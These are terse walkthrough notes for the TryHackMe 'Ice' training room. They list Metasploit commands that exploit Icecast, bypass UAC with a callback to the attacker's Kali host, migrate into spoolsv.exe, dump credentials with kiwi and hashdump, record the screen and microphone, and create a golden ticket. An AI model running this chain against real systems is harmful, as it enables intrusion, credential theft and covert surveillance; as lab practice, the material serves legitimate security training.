Last updated 6 months ago
Room Link: https://tryhackme.com/room/ice
Kali
nmap -A $VICTIM
msfconsole
Metasploit
search icecast use 0 set RHOSTS $VICTIM run
Meterpreter
run post/multi/recon/local_exploit_suggester background
use exploit/windows/local/bypassuac_eventvwr set SESSIONS 1 set LHOST $KALI run
We are still user dark but have a lot of privilege's now
ps
ps migrate -N spoolsv.exe
load kiwi creds_all
hashdump
screenshare record_mic golden_ticket_create